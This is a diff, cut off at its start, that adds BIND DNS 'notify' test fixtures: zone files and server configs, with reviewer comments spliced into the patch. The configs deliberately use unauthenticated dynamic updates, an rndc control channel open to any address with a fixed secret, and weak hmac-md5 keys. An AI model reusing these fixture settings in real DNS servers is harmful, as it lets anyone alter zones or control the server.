MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgi + WCn/GxHhai6VAuHAoNUz4YoU1tVfSCSqQYn6//11U6Nl + d80jEeC8aTrO+KKmCaY= ) +cname01 CNAME cname-target. +cname02 CNAME cname-target +cname03 CNAME . +$TTL 300 ; 5 minutes +d A 73.80.65.49 +$TTL 3600 ; 1 hour +dname01 DNAME dname-target. +dname02 DNAME dname-target +dname03 DNAME . 
+$TTL 300 ; 5 minutes +e MX 10 mail + TXT "one" + TXT "three" + TXT "two" + A 73.80.65.49 + A 73.80.65.50 + A 73.80.65.52 + A 73.80.65.51 +f A 73.80.65.52 +$TTL 3600 ; 1 hour +gpos01 GPOS "-22.6882" "116.8652" "250.0" +gpos02 GPOS "" "" "" +hinfo01 HINFO "Generic PC clone" "NetBSD-1.4" +hinfo02 HINFO "PC" "NetBSD" +isdn01 ISDN "isdn-address" +isdn02 ISDN "isdn-address" "subaddress" +isdn03 ISDN "isdn-address" +isdn04 ISDN "isdn-address" "subaddress" +key01 KEY 512 255 1 ( + AQMFD5raczCJHViKtLYhWGz8hMY9UGRuniJDBzC7w0aR + yzWZriO6i2odGWWQVucZqKVsENW91IOW4vqudngPZsY3 + GvQ/xVA8/7pyFj6b7Esga60zyGW6LFe9r8n6paHrlG5o + jqf0BaqHT+8= ) +kx01 KX 10 kdc +kx02 KX 10 . +loc01 LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +loc02 LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +mb01 MG madname +mb02 MG . +mg01 MG mgmname +mg02 MG . +minfo01 MINFO rmailbx emailbx +minfo02 MINFO . . +mr01 MR mrname +mr02 MR . +mx01 MX 10 mail +mx02 MX 10 . +naptr01 NAPTR 0 0 "" "" "" . +naptr02 NAPTR 65535 65535 "blurgh" "blorf" "blllbb" foo. +nsap-ptr01 NSAP-PTR foo. + NSAP-PTR . +nsap01 NSAP 0x47000580005a0000000001e133ffffff00016100 +nsap02 NSAP 0x47000580005a0000000001e133ffffff00016100 +nxt01 NXT a.secure ( NS SOA MX SIG KEY LOC NXT ) +nxt02 NXT . ( NSAP-PTR NXT ) +nxt03 NXT . ( A ) +nxt04 NXT . ( 127 ) +ptr01 PTR example. +px01 PX 65535 foo. bar. +px02 PX 65535 . . +rp01 RP mbox-dname txt-dname +rp02 RP . . +rt01 RT 0 intermediate-host +rt02 RT 65535 . +$TTL 300 ; 5 minutes +s NS ns.s +$ORIGIN s.example. +ns A 73.80.65.49 +$ORIGIN example. +$TTL 3600 ; 1 hour +sig01 SIG NXT 1 3 3600 20000102030405 ( + 19961211100908 2143 foo + MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgi + WCn/GxHhai6VAuHAoNUz4YoU1tVfSCSqQYn6//11U6Nl + d80jEeC8aTrO+KKmCaY= ) +srv01 SRV 0 0 0 . +srv02 SRV 65535 65535 65535 old-slow-box.example.com. 
+$TTL 301 ; 5 minutes 1 second +t A 73.80.65.49 +$TTL 3600 ; 1 hour +txt01 TXT "foo" +txt02 TXT "foo" "bar" +txt03 TXT "foo" +txt04 TXT "foo" "bar" +txt05 TXT "foo bar" +txt06 TXT "foo bar" +txt07 TXT "foo bar" +txt08 TXT "foo\010bar" +txt09 TXT "foo\010bar" +txt10 TXT "foo bar" +txt11 TXT "\"foo\"" +txt12 TXT "\"foo\"" +$TTL 300 ; 5 minutes +u TXT "txt-not-in-nxt" +$ORIGIN u.example. +a A 73.80.65.49 +b A 73.80.65.49 +$ORIGIN example. +$TTL 3600 ; 1 hour +wks01 WKS 10.0.0.1 6 ( 0 1 2 21 23 ) +wks02 WKS 10.0.0.1 17 ( 0 1 2 53 ) +wks03 WKS 10.0.0.2 6 ( 65535 ) +x2501 X25 "123456789" diff --git a/bin/tests/system/notify/ns2/example2.db b/bin/tests/system/notify/ns2/example2.db new file mode 100644 index 0000000..c762dd6 --- /dev/null +++ b/bin/tests/system/notify/ns2/example2.db 
@@ -0,0 +1,144 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +example IN SOA mname1. . ( + 2 ; serial + 300 ; refresh (300 seconds) + 300 ; retry (300 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +example. NS ns2.example. +ns2.example. A 10.53.0.2 +example. NS ns3.example. +ns3.example. A 10.53.0.3 + +$ORIGIN example. +a A 10.0.0.2 +$TTL 3600 ; 1 hour +a01 A 0.0.0.0 +a02 A 255.255.255.255 +a601 AAAA ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff +afsdb01 AFSDB 0 hostname +afsdb02 AFSDB 65535 . +$TTL 300 ; 5 minutes +b CNAME foo.net. +c A 73.80.65.49 +$TTL 3600 ; 1 hour +cert01 CERT 65534 65535 PRIVATEOID ( + MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgi + WCn/GxHhai6VAuHAoNUz4YoU1tVfSCSqQYn6//11U6Nl + d80jEeC8aTrO+KKmCaY= ) +cname01 CNAME cname-target. +cname02 CNAME cname-target +cname03 CNAME . +$TTL 300 ; 5 minutes +d A 73.80.65.49 +$TTL 3600 ; 1 hour +dname01 DNAME dname-target. +dname02 DNAME dname-target +dname03 DNAME . 
+$TTL 300 ; 5 minutes +e MX 10 mail + TXT "one" + TXT "three" + TXT "two" + A 73.80.65.49 + A 73.80.65.50 + A 73.80.65.52 + A 73.80.65.51 +f A 73.80.65.52 +$TTL 3600 ; 1 hour +gpos01 GPOS "-22.6882" "116.8652" "250.0" +gpos02 GPOS "" "" "" +hinfo01 HINFO "Generic PC clone" "NetBSD-1.4" +hinfo02 HINFO "PC" "NetBSD" +isdn01 ISDN "isdn-address" +isdn02 ISDN "isdn-address" "subaddress" +isdn03 ISDN "isdn-address" +isdn04 ISDN "isdn-address" "subaddress" +key01 KEY 512 255 1 ( + AQMFD5raczCJHViKtLYhWGz8hMY9UGRuniJDBzC7w0aR + yzWZriO6i2odGWWQVucZqKVsENW91IOW4vqudngPZsY3 + GvQ/xVA8/7pyFj6b7Esga60zyGW6LFe9r8n6paHrlG5o + jqf0BaqHT+8= ) +kx01 KX 10 kdc +kx02 KX 10 . +loc01 LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +loc02 LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +mb01 MG madname +mb02 MG . +mg01 MG mgmname +mg02 MG . +minfo01 MINFO rmailbx emailbx +minfo02 MINFO . . +mr01 MR mrname +mr02 MR . +mx01 MX 10 mail +mx02 MX 10 . +naptr01 NAPTR 0 0 "" "" "" . +naptr02 NAPTR 65535 65535 "blurgh" "blorf" "blllbb" foo. +nsap-ptr01 NSAP-PTR foo. + NSAP-PTR . +nsap01 NSAP 0x47000580005a0000000001e133ffffff00016100 +nsap02 NSAP 0x47000580005a0000000001e133ffffff00016100 +nxt01 NXT a.secure ( NS SOA MX SIG KEY LOC NXT ) +nxt02 NXT . ( NSAP-PTR NXT ) +nxt03 NXT . ( A ) +nxt04 NXT . ( 127 ) +ptr01 PTR example. +px01 PX 65535 foo. bar. +px02 PX 65535 . . +rp01 RP mbox-dname txt-dname +rp02 RP . . +rt01 RT 0 intermediate-host +rt02 RT 65535 . +$TTL 300 ; 5 minutes +s NS ns.s +$ORIGIN s.example. +ns A 73.80.65.49 +$ORIGIN example. +$TTL 3600 ; 1 hour +sig01 SIG NXT 1 3 3600 20000102030405 ( + 19961211100908 2143 foo + MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgi + WCn/GxHhai6VAuHAoNUz4YoU1tVfSCSqQYn6//11U6Nl + d80jEeC8aTrO+KKmCaY= ) +srv01 SRV 0 0 0 . +srv02 SRV 65535 65535 65535 old-slow-box.example.com. 
+$TTL 301 ; 5 minutes 1 second +t A 73.80.65.49 +$TTL 3600 ; 1 hour +txt01 TXT "foo" +txt02 TXT "foo" "bar" +txt03 TXT "foo" +txt04 TXT "foo" "bar" +txt05 TXT "foo bar" +txt06 TXT "foo bar" +txt07 TXT "foo bar" +txt08 TXT "foo\010bar" +txt09 TXT "foo\010bar" +txt10 TXT "foo bar" +txt11 TXT "\"foo\"" +txt12 TXT "\"foo\"" +$TTL 300 ; 5 minutes +u TXT "txt-not-in-nxt" +$ORIGIN u.example. +a A 73.80.65.49 +b A 73.80.65.49 +$ORIGIN example. +$TTL 3600 ; 1 hour +wks01 WKS 10.0.0.1 6 ( 0 1 2 21 23 ) +wks02 WKS 10.0.0.1 17 ( 0 1 2 53 ) +wks03 WKS 10.0.0.2 6 ( 65535 ) +x2501 X25 "123456789" diff --git a/bin/tests/system/notify/ns2/example3.db b/bin/tests/system/notify/ns2/example3.db new file mode 100644 index 0000000..dd3371b --- /dev/null +++ b/bin/tests/system/notify/ns2/example3.db 
@@ -0,0 +1,144 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +example IN SOA mname1. . ( + 3 ; serial + 300 ; refresh (300 seconds) + 300 ; retry (300 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +example. NS ns2.example. +ns2.example. A 10.53.0.2 +example. NS ns3.example. +ns3.example. A 10.53.0.3 + +$ORIGIN example. +a A 10.0.0.3 +$TTL 3600 ; 1 hour +a01 A 0.0.0.0 +a02 A 255.255.255.255 +a601 AAAA ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff +afsdb01 AFSDB 0 hostname +afsdb02 AFSDB 65535 . +$TTL 300 ; 5 minutes +b CNAME foo.net. +c A 73.80.65.49 +$TTL 3600 ; 1 hour +cert01 CERT 65534 65535 PRIVATEOID ( + MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgi + WCn/GxHhai6VAuHAoNUz4YoU1tVfSCSqQYn6//11U6Nl + d80jEeC8aTrO+KKmCaY= ) +cname01 CNAME cname-target. +cname02 CNAME cname-target +cname03 CNAME . +$TTL 300 ; 5 minutes +d A 73.80.65.49 +$TTL 3600 ; 1 hour +dname01 DNAME dname-target. +dname02 DNAME dname-target +dname03 DNAME . 
+$TTL 300 ; 5 minutes +e MX 10 mail + TXT "one" + TXT "three" + TXT "two" + A 73.80.65.49 + A 73.80.65.50 + A 73.80.65.52 + A 73.80.65.51 +f A 73.80.65.52 +$TTL 3600 ; 1 hour +gpos01 GPOS "-22.6882" "116.8652" "250.0" +gpos02 GPOS "" "" "" +hinfo01 HINFO "Generic PC clone" "NetBSD-1.4" +hinfo02 HINFO "PC" "NetBSD" +isdn01 ISDN "isdn-address" +isdn02 ISDN "isdn-address" "subaddress" +isdn03 ISDN "isdn-address" +isdn04 ISDN "isdn-address" "subaddress" +key01 KEY 512 255 1 ( + AQMFD5raczCJHViKtLYhWGz8hMY9UGRuniJDBzC7w0aR + yzWZriO6i2odGWWQVucZqKVsENW91IOW4vqudngPZsY3 + GvQ/xVA8/7pyFj6b7Esga60zyGW6LFe9r8n6paHrlG5o + jqf0BaqHT+8= ) +kx01 KX 10 kdc +kx02 KX 10 . +loc01 LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +loc02 LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +mb01 MG madname +mb02 MG . +mg01 MG mgmname +mg02 MG . +minfo01 MINFO rmailbx emailbx +minfo02 MINFO . . +mr01 MR mrname +mr02 MR . +mx01 MX 10 mail +mx02 MX 10 . +naptr01 NAPTR 0 0 "" "" "" . +naptr02 NAPTR 65535 65535 "blurgh" "blorf" "blllbb" foo. +nsap-ptr01 NSAP-PTR foo. + NSAP-PTR . +nsap01 NSAP 0x47000580005a0000000001e133ffffff00016100 +nsap02 NSAP 0x47000580005a0000000001e133ffffff00016100 +nxt01 NXT a.secure ( NS SOA MX SIG KEY LOC NXT ) +nxt02 NXT . ( NSAP-PTR NXT ) +nxt03 NXT . ( A ) +nxt04 NXT . ( 127 ) +ptr01 PTR example. +px01 PX 65535 foo. bar. +px02 PX 65535 . . +rp01 RP mbox-dname txt-dname +rp02 RP . . +rt01 RT 0 intermediate-host +rt02 RT 65535 . +$TTL 300 ; 5 minutes +s NS ns.s +$ORIGIN s.example. +ns A 73.80.65.49 +$ORIGIN example. +$TTL 3600 ; 1 hour +sig01 SIG NXT 1 3 3600 20000102030405 ( + 19961211100908 2143 foo + MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgi + WCn/GxHhai6VAuHAoNUz4YoU1tVfSCSqQYn6//11U6Nl + d80jEeC8aTrO+KKmCaY= ) +srv01 SRV 0 0 0 . +srv02 SRV 65535 65535 65535 old-slow-box.example.com. 
+$TTL 301 ; 5 minutes 1 second +t A 73.80.65.49 +$TTL 3600 ; 1 hour +txt01 TXT "foo" +txt02 TXT "foo" "bar" +txt03 TXT "foo" +txt04 TXT "foo" "bar" +txt05 TXT "foo bar" +txt06 TXT "foo bar" +txt07 TXT "foo bar" +txt08 TXT "foo\010bar" +txt09 TXT "foo\010bar" +txt10 TXT "foo bar" +txt11 TXT "\"foo\"" +txt12 TXT "\"foo\"" +$TTL 300 ; 5 minutes +u TXT "txt-not-in-nxt" +$ORIGIN u.example. +a A 73.80.65.49 +b A 73.80.65.49 +$ORIGIN example. +$TTL 3600 ; 1 hour +wks01 WKS 10.0.0.1 6 ( 0 1 2 21 23 ) +wks02 WKS 10.0.0.1 17 ( 0 1 2 53 ) +wks03 WKS 10.0.0.2 6 ( 65535 ) +x2501 X25 "123456789" diff --git a/bin/tests/system/notify/ns2/example4.db b/bin/tests/system/notify/ns2/example4.db new file mode 100644 index 0000000..86d9bf2 --- /dev/null +++ b/bin/tests/system/notify/ns2/example4.db 
@@ -0,0 +1,144 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +example IN SOA mname1. . ( + 4 ; serial + 300 ; refresh (300 seconds) + 300 ; retry (300 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +example. NS ns2.example. +ns2.example. A 10.53.0.2 +example. NS ns3.example. +ns3.example. A 10.53.0.3 + +$ORIGIN example. +a A 10.0.0.4 +$TTL 3600 ; 1 hour +a01 A 0.0.0.0 +a02 A 255.255.255.255 +a601 AAAA ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff +afsdb01 AFSDB 0 hostname +afsdb02 AFSDB 65535 . +$TTL 300 ; 5 minutes +b CNAME foo.net. +c A 73.80.65.49 +$TTL 3600 ; 1 hour +cert01 CERT 65534 65535 PRIVATEOID ( + MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgi + WCn/GxHhai6VAuHAoNUz4YoU1tVfSCSqQYn6//11U6Nl + d80jEeC8aTrO+KKmCaY= ) +cname01 CNAME cname-target. +cname02 CNAME cname-target +cname03 CNAME . +$TTL 300 ; 5 minutes +d A 73.80.65.49 +$TTL 3600 ; 1 hour +dname01 DNAME dname-target. +dname02 DNAME dname-target +dname03 DNAME . 
+$TTL 300 ; 5 minutes +e MX 10 mail + TXT "one" + TXT "three" + TXT "two" + A 73.80.65.49 + A 73.80.65.50 + A 73.80.65.52 + A 73.80.65.51 +f A 73.80.65.52 +$TTL 3600 ; 1 hour +gpos01 GPOS "-22.6882" "116.8652" "250.0" +gpos02 GPOS "" "" "" +hinfo01 HINFO "Generic PC clone" "NetBSD-1.4" +hinfo02 HINFO "PC" "NetBSD" +isdn01 ISDN "isdn-address" +isdn02 ISDN "isdn-address" "subaddress" +isdn03 ISDN "isdn-address" +isdn04 ISDN "isdn-address" "subaddress" +key01 KEY 512 255 1 ( + AQMFD5raczCJHViKtLYhWGz8hMY9UGRuniJDBzC7w0aR + yzWZriO6i2odGWWQVucZqKVsENW91IOW4vqudngPZsY3 + GvQ/xVA8/7pyFj6b7Esga60zyGW6LFe9r8n6paHrlG5o + jqf0BaqHT+8= ) +kx01 KX 10 kdc +kx02 KX 10 . +loc01 LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +loc02 LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +mb01 MG madname +mb02 MG . +mg01 MG mgmname +mg02 MG . +minfo01 MINFO rmailbx emailbx +minfo02 MINFO . . +mr01 MR mrname +mr02 MR . +mx01 MX 10 mail +mx02 MX 10 . +naptr01 NAPTR 0 0 "" "" "" . +naptr02 NAPTR 65535 65535 "blurgh" "blorf" "blllbb" foo. +nsap-ptr01 NSAP-PTR foo. + NSAP-PTR . +nsap01 NSAP 0x47000580005a0000000001e133ffffff00016100 +nsap02 NSAP 0x47000580005a0000000001e133ffffff00016100 +nxt01 NXT a.secure ( NS SOA MX SIG KEY LOC NXT ) +nxt02 NXT . ( NSAP-PTR NXT ) +nxt03 NXT . ( A ) +nxt04 NXT . ( 127 ) +ptr01 PTR example. +px01 PX 65535 foo. bar. +px02 PX 65535 . . +rp01 RP mbox-dname txt-dname +rp02 RP . . +rt01 RT 0 intermediate-host +rt02 RT 65535 . +$TTL 300 ; 5 minutes +s NS ns.s +$ORIGIN s.example. +ns A 73.80.65.49 +$ORIGIN example. +$TTL 3600 ; 1 hour +sig01 SIG NXT 1 3 3600 20000102030405 ( + 19961211100908 2143 foo + MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgi + WCn/GxHhai6VAuHAoNUz4YoU1tVfSCSqQYn6//11U6Nl + d80jEeC8aTrO+KKmCaY= ) +srv01 SRV 0 0 0 . +srv02 SRV 65535 65535 65535 old-slow-box.example.com. 
+$TTL 301 ; 5 minutes 1 second +t A 73.80.65.49 +$TTL 3600 ; 1 hour +txt01 TXT "foo" +txt02 TXT "foo" "bar" +txt03 TXT "foo" +txt04 TXT "foo" "bar" +txt05 TXT "foo bar" +txt06 TXT "foo bar" +txt07 TXT "foo bar" +txt08 TXT "foo\010bar" +txt09 TXT "foo\010bar" +txt10 TXT "foo bar" +txt11 TXT "\"foo\"" +txt12 TXT "\"foo\"" +$TTL 300 ; 5 minutes +u TXT "txt-not-in-nxt" +$ORIGIN u.example. +a A 73.80.65.49 +b A 73.80.65.49 +$ORIGIN example. +$TTL 3600 ; 1 hour +wks01 WKS 10.0.0.1 6 ( 0 1 2 21 23 ) +wks02 WKS 10.0.0.1 17 ( 0 1 2 53 ) +wks03 WKS 10.0.0.2 6 ( 65535 ) +x2501 X25 "123456789" diff --git a/bin/tests/system/notify/ns2/generic.db b/bin/tests/system/notify/ns2/generic.db new file mode 100644 index 0000000..108b552 --- /dev/null +++ b/bin/tests/system/notify/ns2/generic.db @@ -0,0 +1,25 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 1 ; serial + 300 ; refresh (300 seconds) + 300 ; retry (300 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 + NS ns3 +ns2 A 10.53.0.2 +ns3 A 10.53.0.3 + +a A 10.0.0.1 diff --git a/bin/tests/system/notify/ns2/named.conf.in b/bin/tests/system/notify/ns2/named.conf.in new file mode 100644 index 0000000..13b3797 --- /dev/null +++ b/bin/tests/system/notify/ns2/named.conf.in 
@@ -0,0 +1,84 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+ startup-notify-rate 5;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "example" {
+ type primary;
+ file "example.db";
+ // Check that named can handle a empty also-notify.
+ also-notify { /* empty */ };
+};
+
+# use both 'primaries' and 'masters' to test that they
+# can work correctly together.
+primaries noport { 10.53.0.4; };
+masters x21 port @EXTRAPORT1@ { noport; };
+
+zone x1 {
+ type primary;
+ file "generic.db";
+ also-notify { 10.53.0.3; };
+ notify primary-only;
+};
+zone x2 {
+ type primary;
+ file "generic.db";
+ also-notify { 10.53.0.3; };
+ notify master-only; # test old syntax
+};
+
+zone x3 { type primary; file "generic.db"; also-notify { 10.53.0.3; }; };
+zone x4 { type primary; file "generic.db"; also-notify { 10.53.0.3; }; };
+zone x5 { type primary; file "generic.db"; also-notify { 10.53.0.3; }; };
+zone x6 { type primary; file "generic.db"; also-notify { 10.53.0.3; }; };
+zone x7 { type primary; file "generic.db"; also-notify { 10.53.0.3; }; };
+zone x8 { type primary; file "generic.db"; also-notify { 10.53.0.3; }; };
+zone x9 { type primary; file "generic.db"; also-notify { 10.53.0.3; }; };
+zone x10 { type primary; file "generic.db"; also-notify { 10.53.0.3; }; };
+zone x11 { type primary; file "generic.db"; also-notify { 10.53.0.3; }; };
+zone x12 { type primary; file "generic.db"; also-notify { 10.53.0.3; }; };
+zone x13 { type primary; file "generic.db"; also-notify { 10.53.0.3; }; };
+zone x14 { type primary; file "generic.db"; also-notify { 10.53.0.3; }; };
+zone x15 { type primary; file "generic.db"; also-notify { 10.53.0.3; }; };
+zone x16 { type primary; file "generic.db"; also-notify { 10.53.0.3; }; };
+zone x17 { type primary; file "generic.db"; also-notify { 10.53.0.3; }; };
+zone x18 { type primary; file "generic.db"; also-notify { 10.53.0.3; }; };
+zone x19 { type primary; file "generic.db"; also-notify { 10.53.0.3; }; };
+zone x20 { type primary; file "generic.db"; also-notify { 10.53.0.3; }; };
+zone x21 { type primary; file "x21.db"; allow-update { any; }; also-notify { x21; }; };
diff --git a/bin/tests/system/notify/ns3/named.conf.in b/bin/tests/system/notify/ns3/named.conf.in
new file mode 100644
index 0000000..e364e60
--- /dev/null
+++ b/bin/tests/system/notify/ns3/named.conf.in
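Review bot: The `rndc_key` block in notify/ns2/named.conf.in hard-codes `algorithm hmac-sha256;`, while nsec3/ns2/named.conf.in in this same commit writes `algorithm @DEFAULT_HMAC@;` for the identical key; nsec3/ns3/named.conf.in and nsec3/ns3/named2.conf.in hard-code it too. If the substituted value ever differs from hmac-sha256, servers that are presumably driven through one shared rndc configuration will disagree on the key algorithm, so I would use `algorithm @DEFAULT_HMAC@;` in all of them (assuming copy_setports performs that substitution, which is not visible here). Zone x21 also takes `allow-update { any; };` and the control channel is `allow { any; }` with a fixed secret; a comment such as `// test fixture only: unauthenticated updates and an open rndc ACL must not be copied into a production config` would make that explicit. The comment "handle a empty also-notify" should read "an empty".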
@@ -0,0 +1,35 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ recursion yes;
+ notify yes;
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "example" {
+ type secondary;
+ primaries { 10.53.0.2; };
+ file "example.bk";
+};
diff --git a/bin/tests/system/notify/ns4/named.conf.in b/bin/tests/system/notify/ns4/named.conf.in
new file mode 100644
index 0000000..f20d2eb
--- /dev/null
+++ b/bin/tests/system/notify/ns4/named.conf.in
@@ -0,0 +1,35 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.4;
+ notify-source 10.53.0.4;
+ transfer-source 10.53.0.4;
+ port @EXTRAPORT1@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.4; };
+ listen-on-v6 { none; };
+ recursion yes;
+ notify yes;
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "x21" {
+ type secondary;
+ primaries { 10.53.0.2 port @PORT@; };
+ file "x21.bk";
+};
diff --git a/bin/tests/system/notify/ns4/named.port.in b/bin/tests/system/notify/ns4/named.port.in
new file mode 100644
index 0000000..8e94a3c
--- /dev/null
+++ b/bin/tests/system/notify/ns4/named.port.in
@@ -0,0 +1 @@
+@EXTRAPORT1@
diff --git a/bin/tests/system/notify/ns5/named.conf.in b/bin/tests/system/notify/ns5/named.conf.in
new file mode 100644
index 0000000..5cab276
--- /dev/null
+++ b/bin/tests/system/notify/ns5/named.conf.in
@@ -0,0 +1,69 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+key "a" {
+ algorithm "hmac-md5";
+ secret "aaaaaaaaaaaaaaaaaaaa";
+};
+
+key "b" {
+ algorithm "hmac-md5";
+ secret "bbbbbbbbbbbbbbbbbbbb";
+};
+
+key "c" {
+ algorithm "hmac-md5";
+ secret "cccccccccccccccccccc";
+};
+
+options {
+ query-source address 10.53.0.5;
+ notify-source 10.53.0.5;
+ transfer-source 10.53.0.5;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.5; };
+ listen-on-v6 { none; };
+ recursion yes;
+ notify yes;
+};
+
+view "a" {
+ match-clients { key "a"; };
+ zone "x21" {
+ type primary;
+ also-notify { 10.53.0.5 key "b"; 10.53.0.5 key "c"; };
+ file "x21.db";
+ allow-update { any; };
+ };
+};
+
+view "b" {
+ match-clients { key "b"; };
+ zone "x21" {
+ type secondary;
+ primaries { 10.53.0.5 key "a"; };
+ file "x21.bk-b";
+ notify no;
+ };
+};
+
+view "c" {
+ match-clients { key "c"; };
+ zone "x21" {
+ type secondary;
+ primaries { 10.53.0.5 key "a"; };
+ file "x21.bk-c";
+ notify no;
+ };
+};
diff --git a/bin/tests/system/notify/ns5/x21.db b/bin/tests/system/notify/ns5/x21.db
new file mode 100644
index 0000000..8f2ac7d
--- /dev/null
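Review bot: The three TSIG keys `a`, `b` and `c` in notify/ns5/named.conf.in are declared with `algorithm "hmac-md5";`, a legacy algorithm that is unavailable in builds where MD5 is disabled, so the multi-view NOTIFY check would fail there for a reason unrelated to NOTIFY. Nothing visible in the test depends on MD5 itself; I would write `algorithm @DEFAULT_HMAC@;` as nsec3/ns2/named.conf.in already does. The matching client side in notify/tests.sh passes `-y b:bbbbbbbbbbbbbbbbbbbb` and `key a aaaaaaaaaaaaaaaaaaaa` with no algorithm prefix, so those lines would need the algorithm spelled out in the same change (for example `-y "${DEFAULT_HMAC}:b:bbbbbbbbbbbbbbbbbbbb"`, if conf.sh exports that variable, which is not shown here). A short comment marking the repeated-character secrets as throwaway fixture values would also help.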
+++ b/bin/tests/system/notify/ns5/x21.db
@@ -0,0 +1,22 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 1 ; serial
+ 300 ; refresh (300 seconds)
+ 300 ; retry (300 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
